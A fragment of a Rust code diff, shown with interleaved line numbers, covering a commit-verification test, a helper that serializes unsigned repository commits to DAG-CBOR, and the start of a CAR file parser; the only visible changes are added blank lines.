async fn test_verify_live_commit() {
8
9
let client = reqwest::Client::new();
···
51
52
}
52
53
}
53
54
}
55
+
54
56
fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> {
55
57
#[derive(serde::Serialize)]
56
58
struct UnsignedCommit<'a> {
···
72
74
};
73
75
serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
74
76
}
77
+
75
78
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
76
79
use std::io::Read;
77
80
fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {